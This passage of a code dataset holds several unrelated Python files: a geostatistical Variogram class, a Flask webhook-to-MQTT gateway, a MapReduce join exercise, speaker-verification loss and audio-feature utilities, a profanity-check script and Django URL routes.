'minmax':\n self._estimator = minmax\n elif estimator.lower() == 'entropy' or estimator.lower() == 'h':\n self._estimator = entropy\n else:\n raise ValueError('Variogram estimator %s is not understood, please provide the function.' 
% estimator)\n else:\n self._estimator = estimator\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, value):\n self.set_model(model=value)\n\n def set_model(self, model):\n \"\"\"\n Set model as the new theoretical variogram function. Either a function returning the semivariance at a given lag\n for given parameters is needed, or a string identifying a default one. Supported are 'spherical', 'exponential'\n or 'gaussian'.\n\n :param model:\n :return:\n \"\"\"\n if isinstance(model, str):\n if model.lower() == 'spherical':\n self._model = spherical\n elif model.lower() == 'exponential':\n self._model = exponential\n elif model.lower() == 'gaussian':\n self._model = gaussian\n elif model.lower() == 'cubic':\n self._model = cubic\n elif model.lower() == 'stable':\n self._model = stable\n elif model.lower() == 'matern':\n self._model = matern\n else:\n raise ValueError('The theoretical Variogram function %s is not understood, '\n 'please provide the function' % model)\n else:\n self._model = model\n\n def binify_like(self, how='even width'):\n \"\"\"\n Specify, how the bins for the Variogram shall be drawn. how can identify one of the prepared binning algorithms.\n Use 'even_width' or 'even width' for the binify_even_width function and 'even bin' or 'even_bin' for the\n binity_even_bins function. If how is callable, it will be used as bm_func.\n It will be called by the bm property with N, the number of bins and the bm_kwargs as arguments and has to return\n the bm matrix and an array of bin widths.\n\n :param how:\n :return:\n \"\"\"\n # remove the _bm if necessary\n if hasattr(self, '_bm'):\n delattr(self, '_bm')\n if hasattr(self, 'bin_widths'):\n delattr(self, 'bin_widths')\n\n if callable(how):\n self.bm_func = how\n elif how.lower().replace('_', ' ') == 'even width':\n self.bm_func = binify_even_width\n elif how.lower().replace('_', ' ') == 'even bin':\n self.bm_func = binify_even_bin\n else:\n raise ValueError(\"how has to be a callable or one of ['even width', 'even bin']\")\n\n def clone(self):\n \"\"\"\n Wrapper for copy.deepcopy function of self.\n \"\"\"\n return copy.deepcopy(self)\n\n def set_dm(self, dm=None, **kwargs):\n \"\"\"\n calculates the distance matrix if needed and sets it as a static attribute self._dm.\n\n \"\"\"\n # update kwargs\n self._dm_kwargs.update(kwargs)\n\n if dm is None:\n self._dm = self.dm_func(self._X, **self._dm_kwargs)\n if hasattr(self, '_bm'):\n self.set_bm()\n else:\n self._dm = dm\n\n @property\n def dm(self):\n \"\"\"\n Return the distance matrix, this variogram instance is using.\n In case a static distance matrix self._dm was set before, this will be returned.\n Otherwise a distance matrix will be calculated using the function self.dm_func along with the\n keyword arguments self._dm_kwargs.\n\n :return: distance matrix, like returned by :func:`scipy.spatial.squareform`\n \"\"\"\n if hasattr(self, '_dm'):\n return self._dm\n else:\n return self.dm_func(self._X, **self._dm_kwargs)\n\n\n def set_bm(self, bm=None, maxlag=None, **kwargs):\n \"\"\"\n Calculate a static binning matrix on the basis of the distance matrix self.dm. 
Will be set as\n attribute self._bm.\n Whenever a new binning matrix is set, the self.bin_widths attribute gets updated.\n\n :return:\n \"\"\"\n # overwrite maxlag\n if maxlag is not None:\n if maxlag < 1:\n self.__maxlag = maxlag * np.max(self.dm)\n else:\n self._maxlag = maxlag\n\n # store the bm_kwargs\n self._bm_kwargs.update(kwargs)\n\n if bm is None:\n self._bm, self.bin_widths = self.bm_func(X=self._X, dm=self.dm, maxlag=self.maxlag, **self._bm_kwargs)\n else:\n if hasattr(self, 'bin_widths'):\n delattr(self, 'bin_widths')\n self._bm = bm\n\n @property\n def bm(self):\n \"\"\"\n Return the binning matrix, this variogram instance is using.\n In case a static binning matrix self._bm was set before, this will be returned.\n Otherwise a binning matrix will be calculated using the function self.bm_func along with the\n keyword arguments self._bm_kwargs.\n The binning matrix will assign for each point pair the corresponding bin. By setting a custom\n bin matrix unsing Variogram.set_bm, you can also implement non-regular bins.\n\n :return: binning matrix in the style of :func:`scipy.spatial.squareform`\n \"\"\"\n if hasattr(self, '_bm'):\n return self._bm\n else:\n _bm, self.bin_widths = self.bm_func(X=self._X, dm=self.dm, maxlag=self.maxlag, **self._bm_kwargs)\n return _bm\n\n @property\n def maxlag(self):\n return self._maxlag\n\n @maxlag.setter\n def maxlag(self, value):\n # a maxlag was set, therefore the _bm and bin_widths attributes have to be cleared\n if hasattr(self, '_bm'):\n delattr(self, '_bm')\n if hasattr(self, 'bin_widths'):\n delattr(self, 'bin_widths')\n\n # set new maxlag\n if value is None:\n self._maxlag = None\n elif value < 1:\n self._maxlag = value * np.max(self.dm)\n else:\n self._maxlag = value\n\n @property\n def experimental(self):\n \"\"\"\n :return: experimental variogram as a numpy.ndarray.\n \"\"\"\n # group the values to bins and apply the estimator\n _g = self.grouped_pairs\n\n # apply\n return np.array(self._estimator(_g))\n\n @property\n def grouped_pairs(self):\n \"\"\"\n Result of the group_to_bin function. This property will be used for wrapping the function, in case there are\n alternative grouping functions implemented one day.\n\n :return:\n \"\"\"\n if self.is_directional:\n return group_to_bin(self.values, self.bm, X=self._X, azimuth_deg=self.azimuth, tolerance=self.tolerance,\n maxlag=self.maxlag)\n else:\n return group_to_bin(self.values, self.bm, maxlag=self.maxlag)\n\n\n def fit(self, x, y):\n \"\"\"\n Fit the theoretical variogram function to the experimental values. The function will be fitted using the least\n square method, with a maximum of maxiter iteration, defaults to 1000. For fitting the starting parameters of\n the theoretical function a, C0, b can be given as kwargs. 
If the Variogram uses a custom model, the parameters\n might have other names.\n The parameter set with best fit will be returned.\n\n THIS STUFF NEEDS A COMPLETE REWORK\n\n :return:\n \"\"\"\n # if last bin is set, delete it\n if hasattr(self, 'last_bin'):\n del self.last_bin\n\n # remove nans\n _x = x[~np.isnan(y)]\n _y = y[~np.isnan(y)]\n\n if self.fit_method == 'lm':\n# bounds = (0, [np.nanmax(x), np.nanmax(y)])\n bounds = (0, self.__get_fit_bounds(x, y))\n return curve_fit(self._model, _x, _y, p0=bounds[1], bounds=bounds)\n\n elif self.fit_method == 'pec':\n # Run the fitting with each point excluded\n rmse, cof, cov, punish = list(), list(), list(), list()\n # get the histogram counts (the cumsum of bin sizes, summed from right to left)\n _h = self.hist[~np.isnan(y)]\n h = np.flipud(np.cumsum(np.flipud(_h)))\n\n for i in range(1, len(_x) - 2):\n# bnd = (0, [np.max(_x[:-i]), np.max(_y[:-i])])\n bnd = (0, self.__get_fit_bounds(x[:-i], y[:-i]))\n cf, cv = curve_fit(self._model, _x[:-i], _y[:-i], p0=bnd[1], bounds=bnd)\n cof.append(cf)\n cov.append(cov)\n p = ((h[0] + 1) / ((h[0] + 1) - h[-i]))**self.pec_punish\n rmse.append(p * (np.sqrt(np.sum((self._model(_x[:-i], *cf) - _x[:-i]) ** 2) / len(_x[:-i]))))\n punish.append(p)\n\n if self.verbose:\n print('Punish Weights: ', ['%.3f' % _ for _ in punish])\n print('RMSE: ', ['%.2f' % _ for _ in rmse])\n # here rmse is the error for the cf set in cof\n # find the optimum of excluded points to rmse error improvement\n best_rmse = rmse.index(np.nanmin(rmse))\n self.last_bin = len(x) - (best_rmse + 1)\n\n return cof[best_rmse], cov[best_rmse]\n\n else:\n raise ValueError('The fit method {} is not understood. Use either \\'lm\\' (least squares) or \\'pec\\' (point exclusion cost).'.format(self.fit_method))\n\n\n def __get_fit_bounds(self, x, y):\n \"\"\"\n Return the bounds for parameter space in fitting a variogram model. The bounds are depended on the Model\n that is used\n\n :return:\n \"\"\"\n mname = self._model.__name__\n\n # use range, sill and smoothness parameter\n if mname == 'matern':\n # a is max(x), C0 is max(y) s is limited to 20?\n bounds = [np.nanmax(x), np.nanmax(y), 20.]\n\n # use range, sill and shape parameter\n elif mname == 'stable':\n # a is max(x), C0 is max(y) s is limited to 2?\n bounds = [np.nanmax(x), np.nanmax(y), 2.]\n\n # use only sill\n elif mname == 'nugget':\n # a is max(x):\n bounds = [np.nanmax(x)]\n\n # use range and sill\n else:\n # a is max(x), C0 is max(y)\n bounds = [np.nanmax(x), np.nanmax(y)]\n\n # if use_nugget is True add the nugget\n if self.use_nugget:\n bounds.append(0.99)\n\n return bounds\n\n @property\n def data(self):\n \"\"\"\n Calculates the experimental Variogram. As the bins are only indexed by a integer, the lag array is caculated\n by cummulative summarizing the bin_widths array. If this bin_widths was not returned by the bm_func, even bin\n widths are created matching the number of bins at the maximum entry in the distance matrix. 
This will lead to\n calculation errors, in case the bin widths are not even.\n The theoretical variogram function is fitted to the experimental values at given lags\n and the theoretical function is calculated for all increments and returned.\n\n :return:\n \"\"\"\n # calculate the experimental variogram\n # this might raise an exception if the bm is not present yet\n _exp = self.experimental\n _bin = self.bins\n\n # use relative or absolute bins\n if self.normalized:\n _bin /= np.nanmax(_bin) # normalize X\n _exp /= np.nanmax(_exp) # normalize Y\n x = np.linspace(0, 1, 100) # use 100 increments\n else:\n# x = np.arange(0, np.float64(np.max(_bin)), 1)\n x = np.linspace(0, np.float64(np.nanmax(_bin)), 100)\n\n # fit\n self.cof, self.cov = self.fit(_bin, _exp)\n\n return x, self._model(x, *self.cof)\n\n @property\n def residuals(self):\n \"\"\"\n\n :return:\n \"\"\"\n # get the deviations\n experimental, model = self.__model_deviations()\n\n # calculate the residuals\n return np.fromiter(map(lambda x, y: x - y, model, experimental), np.float)\n\n @property\n def mean_residual(self):\n \"\"\"\n\n :return:\n \"\"\"\n return np.nanmean(np.fromiter(map(np.abs, self.residuals), np.float))\n\n @property\n def RMSE(self):\n # get the deviations\n experimental, model = self.__model_deviations()\n\n # get the sum of squares\n rsum = np.nansum(np.fromiter(map(lambda x, y: (x - y)**2, experimental, model), np.float))\n\n return np.sqrt(rsum / len(model))\n\n @property\n def NRMSE(self):\n return self.RMSE / np.nanmean(self.experimental)\n\n @property\n def NRMSE_r(self):\n return self.RMSE / (np.nanmax(self.experimental) - np.nanmean(self.experimental))\n\n @property\n def r(self):\n \"\"\"\n Pearson correlation of the fitted Variogram\n\n :return:\n \"\"\"\n # get the experimental and theoretical variogram and cacluate means\n experimental, model = self.__model_deviations()\n mx = np.nanmean(experimental)\n my = np.nanmean(model)\n\n # claculate the single pearson correlation terms\n term1 = np.nansum(np.fromiter(map(lambda x, y: (x-mx) * (y-my), experimental, model), np.float))\n\n t2x = np.nansum(np.fromiter(map(lambda x: (x-mx)**2, experimental), np.float))\n t2y = np.nansum(np.fromiter(map(lambda y: (y-my)**2, model), np.float))\n\n return term1 / (np.sqrt(t2x * t2y))\n\n @property\n def NS(self):\n \"\"\"\n Nash Sutcliffe efficiency of the fitted Variogram\n\n :return:\n \"\"\"\n experimental, model = self.__model_deviations()\n mx = np.nanmean(experimental)\n\n # calculate the single nash-sutcliffe terms\n term1 = np.nansum(np.fromiter(map(lambda x, y: (x - y)**2, experimental, model), np.float))\n term2 = np.nansum(np.fromiter(map(lambda x: (x - mx)**2, experimental), np.float))\n\n return 1 - (term1 / term2)\n\n def __model_deviations(self):\n \"\"\"\n These model deviations can be used to calculate different model quality parameters like residuals, RMSE.\n :return:\n \"\"\"\n # get the experimental values and their bin bounds\n _exp = self.experimental\n _bin = self.bins\n\n # get the model parameters\n param = self.describe()\n if 'error' in param:\n raise RuntimeError('The Variogram cannot be applied properly. 
def __model_deviations(self):\n \"\"\"\n These model deviations can be used to calculate different model quality parameters like residuals and RMSE.\n :return:\n \"\"\"\n # get the experimental values and their bin bounds\n _exp = self.experimental\n _bin = self.bins\n\n # get the model parameters\n param = self.describe()\n if 'error' in param:\n raise RuntimeError('The Variogram cannot be applied properly. First, calculate the variogram.')\n\n # calculate the model values at bin bounds\n _model = self._model(_bin, *self.cof)\n\n return _exp, _model\n\n def describe(self):\n \"\"\"\n Return a dictionary of the Variogram parameters\n\n :return:\n \"\"\"\n try:\n if self.normalized:\n maxlag = np.nanmax(self.bins)\n maxvar = np.nanmax(self.experimental)\n else:\n maxlag = 1\n maxvar = 1\n index, data = self.data\n cof = self.cof\n except:\n return dict(name=self._model.__name__, estimator = self._estimator.__name__, error='Variogram not calculated.')\n rdict = dict(\n name=self._model.__name__,\n estimator=self._estimator.__name__,\n range=cof[0] * maxlag,\n sill=cof[1] * maxvar,\n nugget=cof[-1] * maxvar if self.use_nugget else 0\n )\n\n # handle s parameters\n if self._model.__name__ == 'matern':\n rdict['smoothness'] = cof[2]\n elif self._model.__name__ == 'stable':\n rdict['shape'] = cof[2]\n\n return rdict\n\n @property\n def parameters(self):\n \"\"\"\n Extract just the variogram parameters range, sill and nugget from the self.describe return\n\n :return:\n \"\"\"\n d = self.describe()\n if 'error' in d:\n return [None, None, None]\n elif self._model.__name__ == 'matern':\n return list([d['range'], d['sill'], d['smoothness'], d['nugget']])\n elif self._model.__name__ == 'stable':\n return list([d['range'], d['sill'], d['shape'], d['nugget']])\n elif self._model.__name__ == 'nugget':\n return list([d['nugget']])\n else:\n return list([d['range'], d['sill'], d['nugget']])\n\n @property\n def bins(self):\n \"\"\"\n Return the upper bin bounds of the experimental Variogram.\n If no self.bin_widths is set, even width bins are assumed and will be calculated from the distance matrix,\n as the maximum distance divided by the amount of bins.\n\n This will cause errors if the bins are not evenly distributed.\n\n :return:\n \"\"\"\n # do a dummy bm calculation to set actual bin widths\n # TODO: this is just an ugly workaround.\n _bm = self.bm\n\n if hasattr(self, 'bin_widths'):\n _bin = np.cumsum(self.bin_widths)\n else:\n print('Warning: Bin edges were calculated on the fly.')\n n = int(np.max(self.bm) + 1)\n _bin = np.cumsum(np.ones(n) * np.max(self.dm) / n)\n\n return _bin\n\n @property\n def hist(self):\n \"\"\"\n Return a histogram for the present bins in the Variogram. The bin matrix bm will be unstacked and counted.\n Variogram.bins and Variogram.hist can be used together to produce a properly labeled histogram.\n\n :return:\n \"\"\"\n # get the upper triangle from the bin matrix\n# _bm = self.bm\n# ut = [_bm[i, j] for i in range(len(_bm)) for j in range(len(_bm)) if j > i]\n# return np.bincount(ut)\n\n # get the grouped pairs\n _g = self.grouped_pairs\n return np.array([len(_) / 2 for _ in _g])\n\n 
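# e.g. a quick look at the bin occupancy (sketch; 'V' is a hypothetical\n # fitted Variogram instance, plt is the module-level matplotlib import):\n #   plt.bar(V.bins, V.hist)\n\n 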
By default, the experimental data\n will be represented by blue points and the theoretical model by a green line.\n\n :return:\n \"\"\"\n try:\n _bin, _exp = self.bins, self.experimental\n if cof is None:\n x, data = self.data\n else:\n x = np.linspace(0, 1, 100) if self.normalized else np.linspace(0, np.nanmax(_bin), 100)\n data = self._model(x, *cof)\n _hist = self.hist\n except Exception as e:\n raise RuntimeError('A chart could not be drawn, as the input data is not complete. Please calculate the Variogram first.\\nDetailed message: %s.' % str(e))\n\n # handle the relative experimental variogram\n if self.normalized:\n _bin /= np.nanmax(_bin)\n _exp /= np.nanmax(_exp)\n\n # do the plotting\n if axes is None:\n fig = plt.figure()\n ax1 = plt.subplot2grid((5, 1), (1, 0), rowspan=4)\n ax2 = plt.subplot2grid((5, 1), (0, 0), sharex=ax1)\n fig.subplots_adjust(hspace=0)\n else:\n ax1, ax2 = axes\n fig = ax1.get_figure()\n\n # calc histgram bar width\n # bar use 70% of the axis, w is the total width divided by amount of bins in the histogram\n w = (np.max(_bin) * 0.7) / len(_hist)\n\n # plot Variograms\n\n # if last_bin is set, plot only considered bins in blue, excluded in red\n ax1.plot(_bin, _exp, '.b')\n ax1.plot(x, data, '-g')\n\n if hasattr(self, 'last_bin'):\n ax1.plot(_bin[self.last_bin:], _exp[self.last_bin:], '.r')\n\n\n # plot histogram\n ax2.bar(_bin, _hist, width=w, align='center')\n # adjust\n plt.setp(ax2.axes.get_xticklabels(), visible=False)\n ax2.axes.set_yticks(ax2.axes.get_yticks()[1:])\n\n # ax limits\n if self.normalized:\n ax1.set_xlim([0, 1.05])\n ax1.set_ylim([0, 1.05])\n\n if grid:\n ax1.vlines(_bin, *ax1.axes.get_ybound(), colors=(.85, .85, .85), linestyles='dashed')\n ax2.vlines(_bin, *ax2.axes.get_ybound(), colors=(.85, .85, .85), linestyles='dashed')\n\n # annotation\n ax1.axes.set_ylabel('semivariance (%s)' % self._estimator.__name__)\n ax1.axes.set_xlabel('Lag (-)')\n ax2.axes.set_ylabel('N')\n\n # show the figure\n if show:\n fig.show()\n\n return fig\n\n\n def scattergram(self, ax=None, plot=True):\n \"\"\"\n Plot a scattergram, which is a scatter plot of\n\n :return:\n \"\"\"\n # calculate population mean\n _mean = np.mean(self.values1D)\n\n # group the values to bins\n gbm = self.grouped_pairs\n\n # create the tail and head arrays\n tail, head = list(), list()\n\n # order the point pairs to tail and head\n for grp in gbm:\n # the even values are z(x) and odd values are z(x+h)\n for i in range(0, len(grp) - 1, 2):\n tail.append(_mean - grp[i])\n head.append(_mean - grp[i + 1])\n\n # if no plot is questioned, return tail and head arrays\n if not plot:\n return tail, head\n\n # else plot in either given Ax object or create a new one\n if ax is None:\n fig, ax = plt.subplots(1, 1)\n else:\n fig = ax.get_figure()\n\n # plot\n ax.plot(tail, head, '.k')\n\n # show the figure\n fig.show()\n\n return fig\n\n def location_trend(self, axes=None):\n \"\"\"\n Plot the values over each dimension in the coordinates as a scatter plot.\n These plots can be used to identify a correlation between the value of an observation\n and its location. If this is the case, it would violate the fundamental geostatistical\n assumption, that a oberservation is independed of its observation\n\n :param axes: list of `matplotlib.AxesSubplots`. 
The len has to match the dimensionality\n of the coordiantes.\n\n :return:\n \"\"\"\n N = len(self._X[0])\n if axes is None:\n # derive the needed amount of col and row\n nrow = int(round(np.sqrt(N)))\n ncol = int(np.ceil(N / nrow))\n fig, axes = plt.subplots(nrow, ncol, figsize=(ncol * 6 ,nrow * 6))\n else:\n if not len(axes) == N:\n raise ValueError('The amount of passed axes does not fit the coordinate dimensionality of %d' % N)\n fig = axes[0].get_figure()\n\n for i in range(N):\n axes.flatten()[i].plot([_[i] for _ in self._X], self.values, '.r')\n axes.flatten()[i].set_xlabel('%d-dimension' % (i + 1))\n axes.flatten()[i].set_ylabel('value')\n\n # plot the figure and return it\n plt.tight_layout()\n fig.show()\n\n return fig\n\n\n\n\n ## ----- implementing some Python functions ---- ##\n def __repr__(self):\n \"\"\"\n Textual representation of this Variogram instance.\n\n :return:\n \"\"\"\n try:\n _name = self._model.__name__\n _b = int(len(self.bins))\n except:\n return \"< abstract Variogram >\"\n return \"< %s Semivariogram fitted to %d bins >\" % (_name, _b)\n\n def __str__(self):\n \"\"\"\n Descriptive respresentation of this Variogram instance that shall give the main variogram\n parameters in a print statement.\n\n :return:\n \"\"\"\n par = self.describe()\n\n _sill = np.NaN if 'error' in par else par['sill']\n _range = np.NaN if 'error' in par else par['range']\n _nugget = np.NaN if 'error' in par else par['nugget']\n\n s = \"{0} Variogram\\n\".format(par['name'])\n s+= \"-\" * (len(s) - 1) + \"\\n\"\n s+= \"Estimator: {0}\\nRange: {1:.2f}\\nSill: {2:.2f}\\nNugget: {3:.2f}\\n\".format(par['estimator'], _range, _sill, _nugget)\n\n return s\n","sub_path":"skgstat/Variogram.py","file_name":"Variogram.py","file_ext":"py","file_size_in_byte":29993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121914084","text":"from flask import Flask\nfrom flask import json\nfrom flask import Response\nfrom flask import request\nimport os\nimport logging\nfrom mqtt import MqttClient\n\n\"\"\"Server class\"\"\"\nclass Server(object):\n\tapp = Flask(__name__)\n\tMQTTC = MqttClient()\n\n\t@app.route(\"/\", methods =['GET', 'POST'])\n\tdef Welcome():\n\t\treturn \"Welcome to my page :)\"\n\n\n\t\"\"\"webhook api\"\"\"\n\t@app.route(\"/webhook\", methods=['GET'])\n\tdef verify():\n\t\treturn request.args.get('hub.challenge')\n\n\t@app.route(\"/webhook\", methods=['POST'])\n\tdef fb_feeds_webhook():\n\t\t\"\"\"webhook api\"\"\"\n\t\tprint('Handling webhook request!!')\n\t\tcontent = request.get_json()\n\t\tif content['entry'][0]['changes'][0]['value']['item'] == 'like':\n\t\t\tmsg = {\n\t\t\t\t\"time\" \t\t: int(content['entry'][0]['time']),\n\t\t\t\t\"topic\" \t: \"LIKE\",\n\t\t\t\t\"user_id\" \t: content['entry'][0]['changes'][0]['value']['user_id']\n\t\t\t\t}\n\t\t\tServer.MQTTC.publish('Facebook', msg)\n\t\t\n\t\tprint('Handled webhook request' + str(content))\n\t\treturn ''\n\n\n\nif __name__ == '__main__':\n\tServer = Server()\n\tServer.app.debug = True\n\tServer.app.run(host = '0.0.0.0', port = int(os.environ.get(\"PORT\", 5000)))\n","sub_path":"Gateway.py","file_name":"Gateway.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79568392","text":"import MapReduce\nimport sys\n\n# Part 1\nmr = MapReduce.MapReduce()\n\n# Part 2\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[1]\n #value = record\n 
# Part 3\ndef reducer(key, list_of_values):\n # key: the join key\n # list_of_values: all records (from both tables) that share this key\n a=[]\n b=[]\n for l in list_of_values:\n if l[0] == \"order\":\n a.append(l)\n else:\n b.append(l)\n # emit the concatenation of every (order, other) pair\n for m in a:\n for n in b:\n x=m+n\n mr.emit(x)\n\n# Part 4\ninputdata = open(sys.argv[1])\nmr.execute(inputdata, mapper, reducer)\n\n'''\ndef locateWords(strlist):\nd = {}\nfor i, substr in enumerate(strlist):\n for word in substr.split()\n if word not in d:\n d[word] = [i]\n else:\n d[word].append(i)\nreturn d\n'''\n","sub_path":"assignment3/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"531639745","text":"import librosa\r\nimport numpy as np\r\nimport torch\r\nimport torch.autograd as grad\r\nimport torch.nn.functional as F\r\n\r\nimport options as opt\r\n\r\ndef get_centroids_prior(embeddings):\r\n centroids = []\r\n for speaker in embeddings:\r\n centroid = 0\r\n for utterance in speaker:\r\n centroid = centroid + utterance\r\n centroid = centroid/len(speaker)\r\n centroids.append(centroid)\r\n centroids = torch.stack(centroids)\r\n return centroids\r\n\r\ndef get_centroids(embeddings):\r\n centroids = embeddings.mean(dim=1)\r\n return centroids\r\n\r\ndef get_centroid(embeddings, speaker_num, utterance_num):\r\n centroid = 0\r\n for utterance_id, utterance in enumerate(embeddings[speaker_num]):\r\n if utterance_id == utterance_num:\r\n continue\r\n centroid = centroid + utterance\r\n centroid = centroid/(len(embeddings[speaker_num])-1)\r\n return centroid\r\n\r\ndef get_utterance_centroids(embeddings):\r\n ##(speaker_ct, utterance_per_speaker_ct, embedding_size)\r\n sum_centroids = embeddings.sum(dim=1)\r\n sum_centroids = sum_centroids.reshape(\r\n sum_centroids.shape[0], 1, sum_centroids.shape[-1])\r\n\r\n num_utterances = embeddings.shape[1] - 1\r\n centroids = (sum_centroids - embeddings) / num_utterances\r\n return centroids\r\n\r\ndef get_cossim_prior(embeddings, centroids):\r\n # Calculates cosine similarity matrix. 
Requires (N, M, feature) input\r\n cossim = torch.zeros(embeddings.size(0),embeddings.size(1),centroids.size(0))\r\n for speaker_num, speaker in enumerate(embeddings):\r\n for utterance_num, utterance in enumerate(speaker):\r\n for centroid_num, centroid in enumerate(centroids):\r\n if speaker_num == centroid_num:\r\n centroid = get_centroid(embeddings, speaker_num, utterance_num)\r\n output = F.cosine_similarity(utterance,centroid,dim=0)+1e-6\r\n cossim[speaker_num][utterance_num][centroid_num] = output\r\n return cossim\r\n\r\ndef get_cossim(embeddings, centroids):\r\n # number of utterances per speaker\r\n num_utterances = embeddings.shape[1]\r\n utterance_centroids = get_utterance_centroids(embeddings)\r\n\r\n utterance_centroids_flat = utterance_centroids.view(\r\n utterance_centroids.shape[0] * utterance_centroids.shape[1],\r\n -1)\r\n embeddings_flat = embeddings.view(\r\n embeddings.shape[0] * num_utterances,\r\n -1)\r\n \r\n cos_same = F.cosine_similarity(embeddings_flat, utterance_centroids_flat)\r\n\r\n centroids_expand = centroids.repeat((num_utterances * embeddings.shape[0], 1))\r\n embeddings_expand = embeddings_flat.unsqueeze(1).repeat(1, embeddings.shape[0], 1)\r\n embeddings_expand = embeddings_expand.view(\r\n embeddings_expand.shape[0] * embeddings_expand.shape[1],\r\n embeddings_expand.shape[-1]\r\n )\r\n cos_diff = F.cosine_similarity(embeddings_expand, centroids_expand)\r\n cos_diff = cos_diff.view(\r\n embeddings.size(0),\r\n num_utterances,\r\n centroids.size(0)\r\n )\r\n # assign the cosine distance for same speakers to the proper idx\r\n same_idx = list(range(embeddings.size(0)))\r\n cos_diff[same_idx, :, same_idx] = cos_same.view(embeddings.shape[0], num_utterances)\r\n cos_diff = cos_diff + 1e-6\r\n return cos_diff\r\n\r\ndef calc_loss_prior(sim_matrix):\r\n # Calculates loss from (N, M, K) similarity matrix\r\n per_embedding_loss = torch.zeros(sim_matrix.size(0), sim_matrix.size(1))\r\n for j in range(len(sim_matrix)):\r\n for i in range(sim_matrix.size(1)):\r\n per_embedding_loss[j][i] = -(sim_matrix[j][i][j] - ((torch.exp(sim_matrix[j][i]).sum()+1e-6).log_()))\r\n loss = per_embedding_loss.sum() \r\n return loss, per_embedding_loss\r\n\r\ndef calc_loss(sim_matrix):\r\n same_idx = list(range(sim_matrix.size(0)))\r\n pos = sim_matrix[same_idx, :, same_idx]\r\n neg = (torch.exp(sim_matrix).sum(dim=2) + 1e-6).log_()\r\n per_embedding_loss = -1 * (pos - neg)\r\n loss = per_embedding_loss.sum()\r\n return loss, per_embedding_loss\r\n\r\ndef normalize_0_1(values, max_value, min_value):\r\n normalized = np.clip((values - min_value) / (max_value - min_value), 0, 1)\r\n return normalized\r\n\r\ndef mfccs_and_spec(wav_file, wav_process = False, calc_mfccs=False, calc_mag_db=False): \r\n sound_file, _ = librosa.core.load(wav_file, sr=opt.sr)\r\n if len(sound_file) ==0:\r\n print(wav_file, len(sound_file), int(opt.window*opt.sr))\r\n window_length = int(opt.window * opt.sr)\r\n hop_length = int(opt.hop * opt.sr)\r\n duration = opt.tisv_frame * opt.hop + opt.window\r\n \r\n # Cut silence and fix length\r\n if wav_process == True:\r\n sound_file, index = librosa.effects.trim(sound_file, top_db=60, frame_length=window_length, hop_length=hop_length)\r\n length = int(opt.sr * duration)\r\n sound_file = librosa.util.fix_length(sound_file, length)\r\n \r\n spec = librosa.stft(sound_file, n_fft=opt.nfft, hop_length=hop_length, win_length=window_length)\r\n mag_spec = np.abs(spec)\r\n \r\n mel_basis = librosa.filters.mel(opt.sr, opt.nfft, n_mels=opt.nmels)\r\n mel_spec = 
np.dot(mel_basis, mag_spec)\r\n \r\n mag_db = librosa.amplitude_to_db(mag_spec)\r\n #db mel spectrogram\r\n mel_db = librosa.amplitude_to_db(mel_spec).T\r\n \r\n mfccs = None\r\n if calc_mfccs:\r\n mfccs = np.dot(librosa.filters.dct(40, mel_db.shape[0]), mel_db).T\r\n \r\n #print(mel_db.size())\r\n return mfccs, mel_db, mag_db\r\n\r\nif __name__ == \"__main__\":\r\n w = grad.Variable(torch.tensor(1.0))\r\n b = grad.Variable(torch.tensor(0.0))\r\n embeddings = torch.tensor([[0,1,0],[0,0,1], [0,1,0], [0,1,0], [1,0,0], [1,0,0]]).to(torch.float).reshape(3,2,3)\r\n centroids = get_centroids(embeddings)\r\n cossim = get_cossim(embeddings, centroids)\r\n sim_matrix = w*cossim + b\r\n loss, per_embedding_loss = calc_loss(sim_matrix)\r\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"175424812","text":"import urllib.parse\r\nimport urllib.request\r\n\r\ndef read_text():\r\n quotes = open(\"words.txt\")\r\n contents_of_files = quotes.read()\r\n print(contents_of_files)\r\n quotes.close()\r\n check_profanity(contents_of_files)\r\n\r\ndef check_profanity(text_to_check):\r\n # percent-encode the text so spaces and punctuation survive the query string\r\n connection = urllib.request.urlopen(\"http://www.wdylike.appspot.com/?q=\" + urllib.parse.quote(text_to_check))\r\n output = connection.read().decode('utf-8')\r\n print(output)\r\n connection.close()\r\n if(\"true\" in output): \r\n print(\"The document contains a curse word!\")\r\n elif(\"false\" in output):\r\n print(\"The document does not contain a curse word!\")\r\n else:\r\n print(\"The document could not be checked!\")\r\n\r\nread_text()\r\n\r\n\r\n\r\n\"\"\"\r\nwith urllib.request.urlopen('http://python.org/') as response:\r\n html = response.read()\r\n print(html)\r\n\"\"\"\r\n","sub_path":"check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"314020800","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom .views import (\n IndexView, ContactView, AttorneyView,\n PracticeAnchorView, AboutView, JobView,\n PortfolioView\n)\n\nurlpatterns = [\n url(r'^$', IndexView.as_view(), name='index'),\n url(r'^contato/$', ContactView.as_view(), name='contact'),\n url(r'^advogados/$', AttorneyView.as_view(), name='attorneys'),\n url(r'^quem-somos/$', AboutView.as_view(), name='about'),\n url(r'^trabalhe-conosco/$', JobView.as_view(), name='job'),\n url(r'^portfolio/$', PortfolioView.as_view(), name='portfolio'),\n url(r'^areas-de-atuacao/$', PracticeAnchorView.as_view(), name='practice_anchor'),\n]\n","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
